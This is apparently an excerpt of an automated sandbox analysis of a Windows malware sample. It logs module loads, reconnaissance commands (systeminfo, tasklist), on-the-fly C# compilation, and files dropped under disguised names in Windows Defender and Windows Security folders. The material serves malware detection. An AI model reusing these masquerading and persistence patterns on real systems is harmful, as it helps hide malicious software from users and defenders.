                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: dlnashext.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: wpdshext.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                                  Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Windows Defender\en-US\based.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Windows Defender\en-US\7c80744c9cd64c
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3e
                                  Source: 8Ck8T5qRcC.exeStatic file information: File size 17830453 > 1048576
                                  Source: 8Ck8T5qRcC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: 8Ck8T5qRcC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: 8Ck8T5qRcC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: 8Ck8T5qRcC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: 8Ck8T5qRcC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: 8Ck8T5qRcC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: 8Ck8T5qRcC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: 8Ck8T5qRcC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 8Ck8T5qRcC.exe, 00000000.00000000.1653907239.0000000000DC6000.00000002.00000001.01000000.00000003.sdmp, 8Ck8T5qRcC.exe, 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmp, s.exe, 00000007.00000000.1692832193.0000000000DB3000.00000002.00000001.01000000.00000011.sdmp, s.exe, 00000007.00000003.1702500179.0000000007643000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000007.00000002.1728643045.0000000000DB3000.00000002.00000001.01000000.00000011.sdmp, svchost.exe, 0000000E.00000002.1729961468.0000000000193000.00000002.00000001.01000000.0000001E.sdmp, svchost.exe, 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1720220248.0000000000193000.00000002.00000001.01000000.0000001E.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: based.exe, 00000004.00000002.2415416350.00007FFE126EB000.00000040.00000001.01000000.00000012.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: based.exe, 00000004.00000002.2418711029.00007FFE130C1000.00000040.00000001.01000000.00000017.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000004.00000002.2414595024.00007FFE11EB1000.00000040.00000001.01000000.00000014.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: based.exe
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: based.exe, based.exe, 00000004.00000002.2391546789.00007FFDFAC15000.00000040.00000001.01000000.0000001A.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: based.exe, 00000004.00000002.2394342718.00007FFDFB31F000.00000040.00000001.01000000.0000000D.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: based.exe, 00000004.00000002.2415059724.00007FFE11ED1000.00000040.00000001.01000000.00000013.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: based.exe, 00000004.00000002.2392560474.00007FFDFAEAF000.00000040.00000001.01000000.00000019.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: based.exe, 00000004.00000002.2418451662.00007FFE12E11000.00000040.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: based.exe, 00000004.00000002.2398061369.00007FFE10241000.00000040.00000001.01000000.00000018.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: based.exe, 00000004.00000002.2398598485.00007FFE10301000.00000040.00000001.01000000.0000001B.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: based.exe, 00000004.00000002.2415416350.00007FFE126EB000.00000040.00000001.01000000.00000012.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: based.exe, 00000004.00000002.2392560474.00007FFDFAEAF000.00000040.00000001.01000000.00000019.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000001.00000003.1666084515.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1667289838.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1763556973.00007FFE13311000.00000002.00000001.01000000.0000000C.sdmp, based.exe, 00000004.00000002.2419769711.00007FFE13241000.00000002.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000004.00000002.2419464738.00007FFE13201000.00000040.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: based.exe, 00000004.00000002.2391546789.00007FFDFAC15000.00000040.00000001.01000000.0000001A.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000003.00000002.1735603222.00007FFDFB78F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: based.exe, 00000004.00000002.2414008753.00007FFE11511000.00000040.00000001.01000000.00000016.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: based.exe, 00000004.00000002.2390904759.00007FFDFAB8C000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: based.exe, based.exe, 00000004.00000002.2392560474.00007FFDFAF31000.00000040.00000001.01000000.00000019.sdmp
                                  Source: 8Ck8T5qRcC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: 8Ck8T5qRcC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: 8Ck8T5qRcC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: 8Ck8T5qRcC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: 8Ck8T5qRcC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC50740 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,4_2_00007FFDFAC50740
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeFile created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_6601125Jump to behavior
                                  Source: python310.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x170f8b
                                  Source: select.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x12cec
                                  Source: wxyubnjmnlae.tmp.18.drStatic PE information: real checksum: 0x0 should be: 0x316d6
                                  Source: based.exe.0.drStatic PE information: real checksum: 0x5d9a9a should be: 0x5e534c
                                  Source: _bz2.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x174bf
                                  Source: libssl-1_1.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x3d34c
                                  Source: libcrypto-1_1.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x110586
                                  Source: setup.exe.7.drStatic PE information: real checksum: 0x55ddc3 should be: 0x56311d
                                  Source: _ssl.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1721f
                                  Source: _queue.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xbdb3
                                  Source: _socket.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xf3db
                                  Source: _sqlite3.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x1ae1a
                                  Source: svchost.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x3e6084
                                  Source: _hashlib.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xc47c
                                  Source: libffi-7.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x9bb1
                                  Source: based.exe.30.drStatic PE information: real checksum: 0x0 should be: 0x397a7b
                                  Source: HpQPPZazcv.exe.30.drStatic PE information: real checksum: 0x0 should be: 0x397a7b
                                  Source: unicodedata.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x5531f
                                  Source: s.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x62099a
                                  Source: _ctypes.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0xe78a
                                  Source: ChainComServermonitor.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x397a7b
                                  Source: updater.exe.18.drStatic PE information: real checksum: 0x55ddc3 should be: 0x56311d
                                  Source: sqlite3.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x9ae0f
                                  Source: powershell.exe.30.drStatic PE information: real checksum: 0x0 should be: 0x397a7b
                                  Source: _decimal.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x28949
                                  Source: _lzma.pyd.2.drStatic PE information: real checksum: 0x0 should be: 0x213c2
                                  Source: 8Ck8T5qRcC.exeStatic PE information: section name: .didat
                                  Source: hacn.exe.0.drStatic PE information: section name: _RDATA
                                  Source: libcrypto-1_1.dll.1.drStatic PE information: section name: .00cfg
                                  Source: VCRUNTIME140.dll.1.drStatic PE information: section name: _RDATA
                                  Source: python310.dll.1.drStatic PE information: section name: PyRuntim
                                  Source: s.exe.1.drStatic PE information: section name: .didat
                                  Source: VCRUNTIME140.dll.2.drStatic PE information: section name: _RDATA
                                  Source: libffi-7.dll.2.drStatic PE information: section name: UPX2
                                  Source: setup.exe.7.drStatic PE information: section name: .xdata
                                  Source: svchost.exe.7.drStatic PE information: section name: .didat
                                  Source: updater.exe.18.drStatic PE information: section name: .xdata
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_3_00A184D5 pushad ; retf 0_3_00A184DD
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_3_00A184D5 pushad ; retf 0_3_00A184DD
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_3_00A0F9AF push cs; retf 0_3_00A0F9B2
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_3_00A0F9AF push cs; retf 0_3_00A0F9B2
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_3_00A184D5 pushad ; retf 0_3_00A184DD
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_3_00A184D5 pushad ; retf 0_3_00A184DD
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_3_00A0F9AF push cs; retf 0_3_00A0F9B2
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_3_00A0F9AF push cs; retf 0_3_00A0F9B2
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB125A push ecx; ret 0_2_00DB126D
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB1DB0 push ecx; ret 0_2_00DB1DC3
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D04506C push rcx; iretd 1_2_00007FF67D04506D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B30ACDD push rcx; retf 003Fh2_2_000001F91B30ACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B33C6DD push rcx; retf 003Fh2_2_000001F91B33C6DE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B36ACDD push rcx; retf 003Fh2_2_000001F91B36ACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201CFD9ACDD push rcx; retf 003Fh4_2_00000201CFD9ACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A5C6DD push rcx; retf 003Fh4_2_00000201D1A5C6DE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A8ACDD push rcx; retf 003Fh4_2_00000201D1A8ACDE
